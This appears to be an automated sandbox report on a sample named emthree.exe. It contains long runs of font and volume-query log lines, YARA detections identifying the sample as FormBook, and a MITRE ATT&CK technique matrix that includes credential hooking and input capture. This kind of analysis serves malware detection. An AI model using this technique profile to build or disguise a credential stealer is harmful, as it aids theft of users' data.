          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\emthree.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match, file source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match, file source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Masquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
